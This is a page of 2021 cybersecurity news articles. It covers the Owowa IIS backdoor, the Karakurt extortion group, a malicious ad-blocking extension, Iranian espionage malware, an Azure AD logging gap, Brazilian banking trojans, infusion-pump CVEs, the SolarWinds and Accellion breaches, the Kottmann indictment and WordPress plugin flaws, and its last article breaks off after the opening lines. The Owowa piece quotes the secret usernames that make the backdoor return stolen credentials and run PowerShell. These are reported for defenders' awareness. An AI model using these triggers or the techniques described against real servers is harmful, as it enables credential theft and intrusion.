Hacking 2024 2023 2022 2021 2020
Hackers Using Malicious IIS Server Module to Steal Microsoft Exchange Credentials
17.12.2021 Hacking Thehackernews
Malicious actors are deploying a previously undiscovered binary, an Internet Information Services (IIS) webserver module dubbed "Owowa," on Microsoft Exchange Outlook Web Access servers with the goal of stealing credentials and enabling remote command execution.
"Owowa is a C#-developed .NET v4.0 assembly that is intended to be loaded as a module within an IIS web server that also exposes Exchange's Outlook Web Access (OWA)," Kaspersky researchers Paul Rascagneres and Pierre Delcher said. "When loaded this way, Owowa will steal credentials that are entered by any user in the OWA login page, and will allow a remote operator to run commands on the underlying server."
The idea that a rogue IIS module can be fashioned as a backdoor is not new. In August 2021, an exhaustive study of the IIS threat landscape by Slovak cybersecurity company ESET revealed as many as 14 malware families that were developed as native IIS modules in an attempt to intercept HTTP traffic and remotely commandeer the compromised computers.
As a persistent component on the compromised system, Owawa is engineered to capture the credentials of users who are successfully authenticated on the OWA authentication web page. Exploitation can then be achieved by sending "seemingly innocuous requests" to the exposed web services by entering specifically crafted commands within the username and password fields in the OWA authentication page of a compromised server.
Specifically, if the OWA username is "jFuLIXpzRdateYHoVwMlfc," Owawa responds back with the encrypted credentials. If the username, on the other hand, is "dEUM3jZXaDiob8BrqSy2PQO1", the PowerShell command typed in the OWA password field is executed, the results of which are sent back to the attacker.
The Russian security firm said it detected a cluster of targets with compromised servers located in Malaysia, Mongolia, Indonesia, and the Philippines that primarily belong to government organizations, with the exception of one server that's attached to a government-owned transportation company. That said, additional organizations in Europe are believed to have been victimized by the actor as well.
Although no links have been unearthed between the Owowa operators and other publicly documented hacking groups, a username "S3crt" (read "secret") that was found embedded in the source code of the identified samples has yielded additional malware executables that are likely the work of the same developer. Chief among them are a number of binaries designed to execute an embedded shellcode, load next-stage malware retrieved from a remote server, and trigger the execution of Cobalt Strike payloads.
Kaspersky's Global Research and Analysis Team (GReAT) also said it identified an account with the same username on Keybase, where the individual has shared offensive tools such as Cobalt Strike and Core Impact, in addition to demonstrating an interest in the latter on RAIDForums.
"IIS modules are not a common format for backdoors, especially when compared to typical web application threats like web shells and can therefore easily be missed during standard file monitoring efforts," Rascagneres and Delcher said. "The malicious module […] represents an effective option for attackers to gain a strong foothold in targeted networks by persisting inside an Exchange server."
Karakurt: A New Emerging Data Theft and Cyber Extortion Hacking Group
17.12.2021 Hacking Thehackernews
A previously undocumented, financially motivated threat group has been connected to a string of data theft and extortion attacks on over 40 entities between September and November 2021.
The hacker collective, which goes by the self-proclaimed name Karakurt and was first identified in June 2021, is capable of modifying its tactics and techniques to adapt to the targeted environment, Accenture's Cyber Investigations, Forensics and Response (CIFR) team said in a report published on December 10.
"The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big game hunting approach," the CIFR team said. "Based on intrusion analysis to date, the threat group focuses solely on data exfiltration and subsequent extortion, rather than the more destructive ransomware deployment."
95% of the known victims are based in North America, while the remaining 5% are in Europe. Professional services, healthcare, industrial, retail, technology, and entertainment verticals have been the most targeted.
The goal, the researchers noted, is to avoid drawing attention to its malicious activities as much as possible by relying on living off the land (LotL) techniques, wherein the attackers abuse legitimate software and functions available in a system such as operating system components or installed software to move laterally and exfiltrate data, as opposed to deploying post-exploitation tools like Cobalt Strike.
With ransomware attacks gaining worldwide attention in the wake of incidents aimed at Colonial Pipeline, JBS, and Kaseya as well as the subsequent law enforcement actions that have caused actors like DarkSide, BlackMatter, and REvil to shutter their operations, Karakurt appears to be trying a different tack.
Rather than deploy ransomware after gaining initial access to victims' internet-facing systems via legitimate VPN credentials, the actor focuses almost exclusively on data exfiltration and extortion, a move that's less likely to bring the targets' business activities to a standstill and yet enable Karakurt to demand a "ransom" in return for the stolen information.
Besides encryption data at rest wherever applicable, organizations are recommended to turn on multiple-factor authentication (MFA) to authenticate accounts, disable RDP on external-facing devices, and update the infrastructure to the latest versions to prevent adversaries from exploiting unpatched systems with publicly-known vulnerabilities.
Ad-Blocking Chrome Extension Caught Injecting Ads in Google Search Pages
15.10.21 Hacking Thehackernews
A new deceptive ad injection campaign has been found leveraging an ad blocker extension for Google Chrome and Opera web browsers to sneakily insert ads and affiliate codes on websites, according to new research from cybersecurity firm Imperva.
The findings come following the discovery of rogue domains distributing an ad injection script in late August 2021 that the researchers connected to an add-on called AllBlock. The extension has since been pulled from both the Chrome Web Store and Opera add-ons marketplaces.
While AllBlock is designed to block ads legitimately, the JavaScript code is injected into every new tab opened on the browser. It works by identifying and sending all links in a web page — typically on search engine results pages — to a remote server, which responds back with a list of websites to replace the genuine links with, leading to a scenario where upon clicking a link, the victim is redirected to a different page.
"When the user clicks on any modified links on the webpage, he will be redirected to an affiliate link," Imperva researchers Johann Sillam and Ron Masas said. "Via this affiliate fraud, the attacker earns money when specific actions like registration or sale of the product take place."
AllBlock is also characterized by a variety of techniques aimed at avoiding detection, including clearing the debug console every 100ms and excluding major search engines. Imperva said the AllBlock extension is likely part of a larger distribution campaign that may have utilized other browser extensions and delivery methods, with ties observed to a previous PBot campaign based on overlaps in domain names and IP addresses.
"Ad injection is an evolving threat that can impact almost any site. Attackers will use anything from browser extensions to malware and adware installed on visitors' devices, making most site owners ill-equipped to handle such attacks," Sillam and Masas said.
"When ad injection is used, the site performance and user experience is degraded, making websites slower and harder to use," the researchers added. "Other impacts of ad injection include loss of customer trust and loyalty, revenue loss from ad placements, blocked content and diminished conversion rates."
Iranian Hackers Abuse Dropbox in Cyberattacks Against Aerospace and Telecom Firms
9.10.21 Hacking Thehackernews
Details have emerged about a new cyber espionage campaign directed against the aerospace and telecommunications industries, primarily in the Middle East, with the goal of stealing sensitive information about critical assets, organizations' infrastructure, and technology while remaining in the dark and successfully evading security solutions.
Boston-based cybersecurity company Cybereason dubbed the attacks "Operation Ghostshell," pointing out the use of a previously undocumented and stealthy remote access trojan (RAT) called ShellClient that's deployed as the main spy tool of choice. The first sign of the attacks was observed in July 2021 against a handpicked set of victims, indicating a highly targeted approach.
"The ShellClient RAT has been under ongoing development since at least 2018, with several iterations that introduced new functionalities, while it evaded antivirus tools and managed to remain undetected and publicly unknown," researchers Tom Fakterman, Daniel Frank, Chen Erlich, and Assaf Dahan said in a technical deep dive published today.
Cybereason traced the roots of this threat back to at least November 6, 2018, previously operating as a standalone reverse shell before evolving to a sophisticated backdoor, highlighting that the malware has been under continuous development with new features and capabilities added by its authors. What's more, the adversary behind the attacks is also said to have deployed an unknown executable named "lsa.exe" to perform credential dumping.
Investigation into the attribution of the cyber-attacks has also yielded an entirely new Iranian threat actor named MalKamak that has been operating since around the same time period and has eluded discovery and analysis thus far, with possible connections to other Iranian state-sponsored APT threat actors such as Chafer APT (aka APT39) and Agrius APT, the latter of which was found posing as ransomware operators in an effort to conceal the origin of a series of data-wiping hacks against Israeli entities.
Besides carrying out reconnaissance and the exfiltration of sensitive data, ShellClient is engineered as a modular portable executable that's capable of performing fingerprinting and registry operations. Also of note is the RAT's abuse of cloud storage services such as Dropbox for command-and-control (C2) communications in an attempt to stay under the radar by blending in with legitimate network traffic originating from the compromised systems.
The Dropbox storage contains three folders, each storing information about the infected machines, the commands to be executed by the ShellClient RAT, and the results of those commands. "Every two seconds, the victim machine checks the commands folder, retrieves files that represent commands, parses their content, then deletes them from the remote folder and enables them for execution," the researchers said.
The aforementioned modus operandi mirrors a tactic adopted by another threat actor called IndigoZebra, which was uncovered as relying on Dropbox API to store commands in a victim-specific sub-folder that's retrieved by the malware prior to execution.
The findings also arrive days after a new advanced persistent threat dubbed "ChamelGang" was identified as behind a string of attacks targeting fuel, energy, and aviation production industries in Russia, the U.S., India, Nepal, Taiwan, and Japan with the goal of stealing data from compromised networks.
New Azure AD Bug Lets Hackers Brute-Force Passwords Without Getting Caught
6.10.21 Hacking Thehackernews
Cybersecurity researchers have disclosed an unpatched security vulnerability in the protocol used by Microsoft Azure Active Directory that potential adversaries could abuse to stage undetected brute-force attacks.
"This flaw allows threat actors to perform single-factor brute-force attacks against Azure Active Directory (Azure AD) without generating sign-in events in the targeted organization's tenant," researchers from Secureworks Counter Threat Unit (CTU) said in a report published on Wednesday.
Azure Active Directory is Microsoft's enterprise cloud-based identity and access management (IAM) solution designed for single sign-on (SSO) and multi-factor authentication. It's also a core component of Microsoft 365 (formerly Office 365), with capabilities to provide authentication to other applications via OAuth.
The weakness resides in the Seamless Single Sign-On feature that allows employees to automatically sign in when using their corporate devices that are connected to enterprise networks without having to enter any password. Seamless SSO is also an "opportunistic feature" in that if the process fails, the login falls back to the default behavior, wherein the user needs to enter their password on the sign-in page.
To achieve this, the mechanism relies on the Kerberos protocol to look up the corresponding user object in Azure AD and issue a ticket-granting ticket (TGT), permitting the user to access the resource in question. But for users of Exchange Online with Office clients older than the Office 2013 May 2015 update, the authentication is carried through a password-based endpoint called "UserNameMixed" that either generates an access token or an error code depending on whether the credentials are valid.
It's these error codes where the flaw stems from. While successful authentication events create sign-ins logs upon sending the access tokens, "Autologon's authentication to Azure AD is not logged," allowing the omission to be leveraged for undetected brute-force attacks through the UserNameMixed endpoint.
Secureworks said it notified Microsoft of the issue on June 29, only for Microsoft to acknowledge the behavior on July 21 as "by design." When reached by The Hacker News, the company said "We've reviewed these claims and determined the technique described does not involve a security vulnerability and protections are in place to help ensure customers remain safe and secure."
Microsoft also clarified the safeguards against brute-force attacks already apply to the aforementioned endpoints, and that the tokens issued by the UserNameMixed API do not provide access to data, adding they need to be presented back to Azure AD to obtain the actual tokens. Such requests for access tokens are protected by Conditional Access, Azure AD Multi-Factor Authentication, Azure AD Identity Protection, and surfaced in sign-in logs, the company noted.
Hackers Targeting Brazil's PIX Payment System to Drain Users' Bank Accounts
6.10.21 Hacking Thehackernews
Two newly discovered malicious Android applications on Google Play Store have been used to target users of Brazil's instant payment ecosystem in a likely attempt to lure victims into fraudulently transferring their entire account balances into another bank account under cybercriminals' control.
"The attackers distributed two different variants of banking malware, named PixStealer and MalRhino, through two separate malicious applications […] to carry out their attacks," Check Point Research said in an analysis shared with The Hacker News. "Both malicious applications were designed to steal money of victims through user interaction and the original PIX application."
The two apps in question, which were uncovered in April 2021, have since been removed from the app store.
Launched in November 2020 by the Central Bank of Brazil, the country's monetary authority, Pix is a state-owned payments platform that enables consumers and companies to make money transfers from their bank accounts without requiring debit or credit cards.
PixStealer, which was found distributed on Google Play as a fake PagBank Cashback service app, is designed to empty a victim's funds to an actor-controlled account, while MalRhino — masquerading as a mobile token app for Brazil's Inter bank — comes with advanced features necessary to collect the list of installed apps and retrieve PIN for specific banks.
"When a user opens their PIX bank application, Pixstealer shows the victim an overlay window, where the user can't see the attacker's moves," the researchers said. "Behind the overlay window, the attacker retrieves the available amount of money and transfers the money, often the entire account balance, to another account."
What unites PixStealer and MalRhino is that both the apps abuse Android's accessibility service to perform malicious actions on the compromised devices, making them the latest addition to a long list of mobile malware that leverages the permission to perpetrate data theft.
Specifically, the fake overlay hijacks the entire screen to display a message "Synchronizing your access... Do not turn off your mobile screen" when, in background, the malware searches for the "Transfer" button to perform the transaction with the help of accessibility APIs.
The MalRhino variant also stands out for its use of Mozilla's Java-based Rhino JS framework to run JavaScript commands inside targeted banking applications, but not before convincing the user to turn on accessibility services.
"This technique is not commonly used on mobile malware and shows how malicious actors are getting innovative to avoid detection and get inside Google Play," the researchers said. "With the increasing abuse of the Accessibility Service by mobile banking malware, users should be wary of enabling the relevant permissions even in the applications distributed via known app stores such as Google Play."
Linux Implementation of Cobalt Strike Beacon Targeting Organizations Worldwide
19.9.21 Hacking Thehackernews
Researchers on Monday took the wraps off a newly discovered Linux and Windows re-implementation of Cobalt Strike Beacon that's actively set its sights on government, telecommunications, information technology, and financial institutions in the wild.
The as-yet undetected version of the penetration testing tool — codenamed "Vermilion Strike" — marks one of the rare Linux ports, which has been traditionally a Windows-based red team tool heavily repurposed by adversaries to mount an array of targeted attacks. Cobalt Strike bills itself as a "threat emulation software," with Beacon being the payload engineered to model an advanced actor and duplicate their post-exploitation actions.
"The stealthy sample uses Cobalt Strike's command-and-control (C2) protocol when communicating to the C2 server and has remote access capabilities such as uploading files, running shell commands and writing to files," Intezer researchers said in a report published today and shared with The Hacker News.
The Israeli cybersecurity company's findings come from an artifact uploaded to VirusTotal on August 10 from Malaysia. As of writing, only two anti-malware engines flag the file as malicious.
Once installed, the malware runs itself in the background and decrypts the configuration necessary for the beacon to function, before fingerprinting the compromised Linux machine and establishing communications with a remote server over DNS or HTTP to retrieve base64-encoded and AES-encrypted instructions that allow it run arbitrary commands, write to files, and upload files back to the server.
Interestingly, additional samples identified during the course of the investigation have shed light on the Windows variant of the malware, sharing overlaps in the functionality and the C2 domains used to remotely commandeer the hosts. Intezer also called out the espionage campaign's limited scope, noting the malware's use in specific attacks as opposed to large-scale intrusions, while also attributing it to a "skilled threat actor" owing to the fact that Vermilion Strike has not been observed in other attacks to date.
This is far from the first time the legitimate security testing toolkit has been used to orchestrate attacks against a wide range of targets. Last month, U.S. security firm Secureworks detailed a spear-phishing campaign undertaken by a threat group tracked as Tin Woodlawn (aka APT32 or OceanLotus) that leveraged a customized and enhanced version of Cobalt Strike to evade security countermeasures in an attempt to steal intellectual property and trade secrets.
"Vermilion Strike and other Linux threats remain a constant threat. The predominance of Linux servers in the cloud and its continued rise invites APTs to modify their toolsets in order to navigate the existing environment," the researchers said.
Traffic Exchange Networks Distributing Malware Disguised as Cracked Software
10.9.21 Hacking Thehackernews
An ongoing campaign has been found to leverage a network of websites acting as a "dropper as a service" to deliver a bundle of malware payloads to victims looking for "cracked" versions of popular business and consumer applications.
"These malware included an assortment of click fraud bots, other information stealers, and even ransomware," researchers from cybersecurity firm Sophos said in a report published last week.
The attacks work by taking advantage of a number of bait pages hosted on WordPress that contain "download" links to software packages, which, when clicked, redirect the victims to a different website that delivers potentially unwanted browser plug-ins and malware, such as installers for Raccoon Stealer, Stop ransomware, the Glupteba backdoor, and a variety of malicious cryptocurrency miners that masquerade as antivirus solutions.
"Visitors who arrive on these sites are prompted to allow notifications; If they allow this to happen, the websites repeatedly issue false malware alerts," the researchers said. "If the users click the alerts, they're directed through a series of websites until they arrive at a destination that's determined by the visitor's operating system, browser type, and geographic location."
Using techniques like search engine optimization, links to the websites appear at the top of search results when individuals search for pirated versions of a wide range of software apps. The activities, considered to be the product of an underground marketplace for paid download services, allows entry-level cyber actors to set up and tailor their campaigns based on geographical targeting.
Traffic exchanges, as the distribution infrastructure is also called, typically require a Bitcoin payment before affiliates can create accounts on the service and begin distributing installers, with sites like InstallBest offering advice on "best practices," such as recommending against using Cloudflare-based hosts for downloaders, as well as using URLs within Discord's CDN, Bitbucket, or other cloud platforms.
On top of that, the researchers also found a number of services that, instead of offering their own malware delivery networks, act as "go-betweens" to established malvertising networks that pay website publishers for traffic. One such traffic supplier is InstallUSD, a Pakistan-based advertising network, which has been linked to a number of malware campaigns involving the cracked software sites.
This is far from the first time "warez" websites have been put to use as an infection vector by threat actors. Earlier this June, a cryptocurrency miner called Crackonosh was found abusing the method to install a coin miner package called XMRig for stealthily exploiting the infected host's resources to mine Monero.
A month later, the attackers behind a piece of malware dubbed MosaicLoader were found targeting individuals searching for cracked software as part of a global campaign to deploy a fully-featured backdoor capable of roping the compromised Windows systems into a botnet.
B.Braun Infusomat Pumps Could Let Attackers Remotely Alter Medication Dosages
25.8.21 Hacking Thehackernews
Cybersecurity researchers have disclosed five previously unreported security vulnerabilities affecting B. Braun's Infusomat Space Large Volume Pump and SpaceStation that could be abused by malicious parties to tamper with medication doses without any prior authentication.
McAfee, which discovered and reported the flaws to the German medical and pharmaceutical device company on January 11, 2021, said the "modification could appear as a device malfunction and be noticed only after a substantial amount of drug has been dispensed to a patient, since the infusion pump displays exactly what was prescribed, all while dispensing potentially lethal doses of medication."
The issues have been addressed by B. Braun in SpaceCom L82 or later, Battery Pack SP with WiFi:L82 or later, and DataModule compactplus version A12 or later.
Infusion pumps are medical devices used to deliver intravenous fluids, such as nutrients and medications, into a patient's body in controlled amounts, while SpaceStation is a configurable docking and communication system designed to accommodate up to four infusion pumps for use in a medical facility. The devices run on a software component called SpaceCom, an embedded Linux system that runs either on the pump from within its smart battery pack or from inside the SpaceStation.
In a nutshell, the flaws identified by McAfee enables an attacker to escalate privileges, view sensitive information, upload arbitrary files, and perform remote code execution —
CVE-2021-33885 – Insufficient Verification of Data Authenticity (CVSS 9.7)
CVE-2021-33882 – Missing Authentication for Critical Function (CVSS 8.2)
CVE-2021-33886 – Use of Externally-Controlled Format String (CVSS 7.7)
CVE-2021-33883 – Cleartext Transmission of Sensitive Information (CVSS 7.1)
CVE-2021-33884 – Unrestricted Upload of File with Dangerous Type (CVSS 5.8)
By chaining together the vulnerabilities, an adversary could "modify a pump's configuration while the pump is in standby mode, resulting in an unexpected dose of medication being delivered to a patient on its next use – all with zero authentication," McAfee Advanced Threat Research team noted in a technical deep-dive.
Put differently, the weaknesses, which arise due to a lack of verification in the pump's operating system, could allow any attacker to send commands or data to it, thereby facilitating remote attacks that not only go undetected but also weaponize the device by altering the amount of medication a patient is expected to receive through infusion.
One caveat of note is that the attacks can only be successful when a pump is idle or in standby mode in between infusions, not to mention such unauthorized modifications to critical pump data necessitate that the threat actor first gain an initial foothold to the local network, or potentially carry out the intrusions over the internet in the event the pumps are directly exposed — a scenario that's unlikely.
"All facilities utilizing SpaceCom, Battery Pack SP with WiFi, and DataModule compactplus should review their IT infrastructure to ensure that a network zone concept has been implemented whereby critical systems, such as infusion pumps, are housed in separate (e.g., by firewalls or VLAN) environments which are not accessible directly from the internet or by unauthorized users," B. Braun said in an advisory published on May 14, 2021.
"Wireless networks should be implemented using multi-factor authentication and industry standard encryption and should be equipped with Intrusion Detection Systems (IDS) and/or Intrusion Prevention Systems (IPS)," the company added.
AP Sources: SolarWinds Hack Got Emails of Top DHS Officials
30.3.2021 Hacking Securityweek
Suspected Russian hackers gained access to email accounts belonging to the Trump administration’s head of the Department of Homeland Security and members of the department’s cybersecurity staff whose jobs included hunting threats from foreign countries, The Associated Press has learned.
The intelligence value of the hacking of then-acting Secretary Chad Wolf and his staff is not publicly known, but the symbolism is stark. Their accounts were accessed as part of what’s known as the SolarWinds intrusion and it throws into question how the U.S. government can protect individuals, companies and institutions across the country if it can’t protect itself.
The short answer for many security experts and federal officials is that it can’t — at least not without some significant changes.
“The SolarWinds hack was a victory for our foreign adversaries, and a failure for DHS,” said Sen. Rob Portman of Ohio, top Republican on the Senate’s Homeland Security and Governmental Affairs Committee. “We are talking about DHS’s crown jewels.”
The Biden administration has tried to keep a tight lid on the scope of the SolarWinds attack as it weighs retaliatory measures against Russia. But an inquiry by the AP found new details about the breach at DHS and other agencies, including the Energy Department, where hackers accessed top officials’ private schedules.
The AP interviewed more than a dozen current and former U.S. government officials, who spoke on the condition of anonymity because of the confidential nature of the ongoing investigation into the hack.
The vulnerabilities at Homeland Security in particular intensify the worries following the SolarWinds attack and an even more widespread hack affecting Microsoft Exchange’s email program, especially because in both cases the hackers were detected not by the government but by a private company.
In December, officials discovered what they describe as a sprawling, monthslong cyberespionage effort done largely through a hack of a widely used software from Texas-based SolarWinds Inc. At least nine federal agencies were hacked, along with dozens of private-sector companies.
U.S. authorities have said the breach appeared to be the work of Russian hackers. Gen. Paul Nakasone, who leads the Pentagon’s cyber force, said last week the Biden administration is considering a “range of options” in response. Russia has denied any role in the hack.
Since then, a series of headline-grabbing hacks has further highlighted vulnerabilities in the U.S. public and private sectors. A hacker tried unsuccessfully to poison the water supply of a small town in Florida in February, and this month a new breach was announced involving untold thousands of Microsoft Exchange email servers the company says was carried out by Chinese state hackers. China has denied involvement in the Microsoft breach.
Sen. Mark Warner, a Virginia Democrat and head of the Senate Intelligence Committee, said the government’s initial response to the discovery of the SolarWinds hack was disjointed.
“What struck me was how much we were in the dark for as long as we were in the dark,” Warner said at a recent cybersecurity conference.
Wolf and other top Homeland Security officials used new phones that had been wiped clean along with the popular encrypted messaging system Signal to communicate in the days after the hack, current and former officials said.
One former administration official, who confirmed the Federal Aviation Administration was among the agencies affected by the breach, said the agency was hampered in its response by outdated technology and struggled for weeks to identify how many servers it had running SolarWinds software.
The FAA initially told the AP in mid-February that it had not been affected by the SolarWinds hack, only to issue a second statement a few days later that it was continuing to investigate.
At least one other Cabinet member besides Wolf was affected. The hackers were able to obtain the private schedules of officials at the Energy Department, including then-Secretary Dan Brouillette, one former high-placed administration official said.
The new disclosures provide a fuller picture of what kind of data was taken in the SolarWinds hack. Several congressional hearings have been held on the subject, but they have been notably short on details.
Rep. Pat Fallon, R-Texas, indicated at one of the hearings that a DHS secretary’s email had been hacked but did not provide additional detail. The AP was able to identify Wolf, who declined to comment other than to say he had multiple email accounts as secretary.
DHS spokeswoman Sarah Peck said “a small number of employees’ accounts were targeted in the breach” and the agency “no longer sees indicators of compromise on our networks.”
The Biden administration has pledged to issue an executive order soon to address “significant gaps in modernization and in technology of cybersecurity across the federal government.” But the list of obstacles facing the federal government is long: highly capable foreign hackers backed by governments that aren’t afraid of U.S. reprisals, outdated technology, a shortage of trained cybersecurity professionals, and a complex leadership and oversight structure.
The recently approved stimulus package includes $650 million in new money for the Cybersecurity and Infrastructure Security Agency to harden the country’s cyber defenses. Federal officials said that amount is only a down payment on much bigger planned spending to improve threat detection.
“We must raise our game,” Brandon Wales, who leads the cybersecurity agency, told a recent House committee hearing.
The agency operates a threat-detection system known as Einstein. Its failure to detect the SolarWinds breach before it was discovered by a private security company alarmed officials. Eric Goldstein, the agency’s executive assistant director for cybersecurity, told Congress that Einstein’s technology was designed a decade ago and has “grown somewhat stale.”
Anthony Ferrante, a former director for cyber incident response at the U.S. National Security Council and current senior managing director at FTI Consulting, said part of the problem, both in government and in the private sector, is the lack of a skilled workforce.
The Microsoft Exchange hack, which to date has not affected any federal government agencies, was also discovered by a private firm.
One issue that’s flummoxed policy makers is that foreign state hackers are increasingly using U.S.-based virtual private networks, or VPNs, to evade detection by U.S. intelligence agencies, which are legally constrained from monitoring domestic infrastructure. The hosting services of Amazon Web Services and GoDaddy were used by the SolarWinds hackers to evade detection, officials said recently.
The Biden administration is not planning to step up government surveillance of the U.S. internet in response and instead wants to focus on tighter partnerships and improved information-sharing with the private-sector companies that already have broad visibility into the domestic internet.
Responsibility for responding to breaches, preventing new ones and providing oversight of those efforts is still unsettled, and last month leaders of the Senate Intelligence Committee criticized the Biden administration for a “disorganized response” to the SolarWinds hack.
The Biden administration tapped Anne Neuberger, the deputy national security adviser for cyber and emergency technology, to respond to the SolarWinds and Microsoft breaches. It hasn’t appointed a national cyber director, a new position, frustrating some members of Congress.
“We’re trying to fight a multifront war without anybody in charge,” said Sen. Angus King, an independent from Maine.
The Biden administration says it’s reviewing how best to set up the new position. “Cybersecurity is a top priority,” said White House spokeswoman Emily Horne.
Energy giant Shell discloses data breach caused by Accellion FTA hack
24.3.2021 Hacking Securityaffairs
Oil and gas giant Royal Dutch Shell (Shell) discloses a data breach resulting from the compromise of its Accellion File Transfer Appliance (FTA) file sharing service.
Energy giant Shell disclosed a data breach resulting from the compromise of an Accellion File Transfer Appliance (FTA) used by the company.
Shell is an Anglo-Dutch multinational oil and gas company with more than 86,000 employees and mede US$180.5 billion in 2020.
According to a data breach notification published by the company on its website, the cyber attack did not affect its network, but it only impacted an Accellion FTA server .
“Shell has been impacted by a data security incident involving Accellion’s File Transfer Appliance. Shell uses this appliance to securely transfer large data files.” reads the data breach notification.
“Upon learning of the incident, Shell addressed the vulnerabilities with its service provider and cyber security team, and started an investigation to better understand the nature and extent of the incident,”
Shell reported the security breach to data authorities and regulators, and impacted individuals and stakeholders.
“There is no evidence of any impact to Shell’s core IT systems as the file transfer service is isolated from the rest of Shell’s digital infrastructure. The ongoing investigation has shown that an unauthorized party gained access to various files during a limited window of time.”
Since the disclosure of the vulnerabilities in Accellion FTA multiple cybercrime groups targeted organizations worldwide. In February, security experts from FireEye linked a series of cyber attacks against organizations running Accellion File Transfer Appliance (FTA) servers to the cybercrime group UNC2546, aka FIN11.
Once compromised the victims’ network, FIN11 hackers demanded the payment of a ransom in Bitcoin to avoid the leak of information on the leak site.
The researchers are tracking two separate clusters of activities. The first cluster tracked as UNC2546 is related to the exploitation of the zero-day flaws in Accellion FTA software and data exfiltration from targeted organizations running the legacy FTA products. The second cluster, tracked as UNC2582, is related to the subsequent extortion activity.
“We have identified overlaps between UNC2582, UNC2546, and prior FIN11 operations, and we will continue to evaluate the relationships between these clusters of activity.” continues FireEye.
FireEye pointed out that despite FIN11 hackers are publishing data from Accellion FTA customers on the Clop ransomware leak site, they did not encrypt systems on the compromised networks.
In response to the wave of attacks, the vendor has released multiple security patches to address the vulnerabilities exploited by the hackers. The company is also going to retire legacy FTA server software by April 30, 2021.
Accellion is urging customers to update to the Kiteworks product, which replaces FTA server.
Swiss expert Till Kottmann indicted for conspiracy, wire fraud, and aggravated identity theft
22.3.2021 Hacking Securityaffairs
Department of Justice announced that Swiss hacker Till Kottmann, 21, has been indicted for conspiracy, wire fraud, and aggravated identity theft.
A group of US hackers recently claimed to have gained access to footage from 150,000 security cameras at banks, jails, schools, healthcare clinics, and prominent organizations.
Hackers also posted images captured from the hacked surveillance video on Twitter with an #OperationPanopticon hashtag, published images show that they have gained root shell access to the surveillance cameras used by Telsa and Cloudflare.
One of the members of the group, Tillie Kottmann (aka “deletescape” and “tillie crimew,”), revealed that they have gained access to these surveillance cameras using a super admin account for the surveillance company Verkada.
According to BleepingComputer, Kottmann has performed reverse engineering of the firmware used by Verkada and discovered hardcoded credentials for a super admin account.
Once Verkada became aware of the hack, it has disabled all internal administrator accounts to prevent any unauthorised access.
Tillie Kottmann is a popular hacker in the cybersecurity community, he was involved in numerous leaks of source code from dozens of large companies, including Intel, Lenovo, Motorola, Nintendo, Nissan, and AMD, Qualcomm.
The DoJ announced this week that Till Kottmann was indicted for computer intrusion and identity and data theft activities spanning 2019 to the present.
According to the US authorities, the activity of the hacker posed a serious threat to hundreds of organizations breached by the man and conspirators.
“A prolific Swiss computer hacker, TILL KOTTMANN, 21, was indicted today by a grand jury in the Western District of Washington for computer intrusion and identity and data theft activities spanning 2019 to the present.” reads the press release published by DoJ. “KOTTMANN, aka “deletescape” and “tillie crimew,” who initially was charged in September 2020, remains in Lucerne, Switzerland, and has received notice of pending U.S. charges.”
“Stealing credentials and data, and publishing source code and proprietary and sensitive information on the web is not protected speech–it is theft and fraud,” said Acting U.S. Attorney Tessa M. Gorman. “These actions can increase vulnerabilities for everyone from large corporations to individual consumers. Wrapping oneself in an allegedly altruistic motive does not remove the criminal stench from such intrusion, theft, and fraud.”
KOTTMANN focuses on targeting “git” and other source code repositories belonging to private companies and public sector entities. The hackers cloned the source code, files, and other confidential and proprietary information, searching for hard-coded administrative credentials and access keys. Then the hacker used these data to further infiltrate the internal infrastructure of the targeted organization and access additional sensitive information and files.
The initial charges are for previous hacking activities as the they date from September 2020. Last Friday, Swiss authorities raided Kottmann’s home and seized electronic devices.
“KOTTMANN then published, or “leaked,” victim data obtained through the actors’ and others’ hacking conduct. The FBI recently seized a website domain operated by KOTTMANN and used by KOTTMANN’s group to publish hacked data.” continues the DoJ. “In order to recruit others, grow the scheme, and further promote the hacking activity and KOTTMANN’s own reputation in the hacking community, KOTTMANN actively communicated with journalists and over social media about computer intrusions and data theft.”
On March 12, 2021, Swiss authorities executed search warrants related to the criminal activity.
“Conspiracy to commit computer fraud and abuse is punishable by up to 5 years in prison. Wire fraud and conspiracy to commit wire fraud are punishable by up to 20 years in prison.” concludes the DoJ. “Aggravated identity theft is punishable by a mandatory minimum 24 months in prison to run consecutive to any sentence imposed on other counts of conviction.”
Millions of sites could be hacked due to flaws in popular WordPress plugins
20.3.2021 Hacking Securityaffairs
Experts found vulnerabilities in two WordPress plugins that could be exploited to run arbitrary code and potentially take over a website.
Security researchers disclosed vulnerabilities in Elementor and WP Super Cache WordPress plugins that could be exploited to run arbitrary code and take over a website under certain circumstances.
The flaws were uncovered in the Elementor and WP Super Cache plugin, the former is a website builder plugin with over seven million installs while the latter has over 2 million installs.
Wordfence researchers discovered multiple stored cross-site scripting (XSS) flaws in the Elementor plugin, which collectively received a CVSS score of 6.4.
The lack of server-side validation for HTML tags in Elementor elements (i.e. Heading, Column, Accordion, Icon Box, and Image Box) allows any users to add executable JavaScripts to a post or page via a crafted request.
“Many of these elements offer the option to set an HTML tag for the content within. For example, the “Heading” element can be set to use H1, H2, H3, etc. tags in order to apply different heading sizes via the header_size parameter.” reads the post published by Wordfence. “Unfortunately, for six of these elements, the HTML tags were not validated on the server side, so it was possible for any user able to access the Elementor editor, including contributors, to use this option to add executable JavaScript to a post or page via a crafted request.”
In case an administrator reviewed a post containing malicious JavaScript, its high privileges could be exploited to conduct malicious activities such as creating an administrator, or add a backdoor to the site.
“Since posts created by contributors are typically reviewed by editors or administrators before publishing, any JavaScript added to one of these posts would be executed in the reviewer’s browser,” continues Wordfence. “If an administrator reviewed a post containing malicious JavaScript, their authenticated session with high-level privileges could be used to create a new malicious administrator, or to add a backdoor to the site. An attack on this vulnerability could lead to site takeover.”
The flaws affect versions prior 3.1.2, the developer team behind the plugin added initial patch in version 3.1.2, while additional fixes were included in version 3.1.4.
The research m0ze from the Patchstack Red Team discovered an authenticated remote code execution (RCE) vulnerability in the WP Super Cache that could be exploited by attackers to upload and execute malicious code, potentially resulting in the site takeover.
The flaw affects plugin versions prior 1.7.2.
Security Researcher Hides ZIP, MP3 Files Inside PNG Files on Twitter
19.3.2021 Hacking Threatpost
The newly discovered steganography method could be exploited by threat actors to obscure nefarious activity inside photos hosted on the social-media platform.
A security researcher has discovered a novel steganography technique for hiding data inside a Portable Network Graphics (.PNG) image file posted on Twitter, a tactic that could be exploited by threat actors to hide malicious activity.
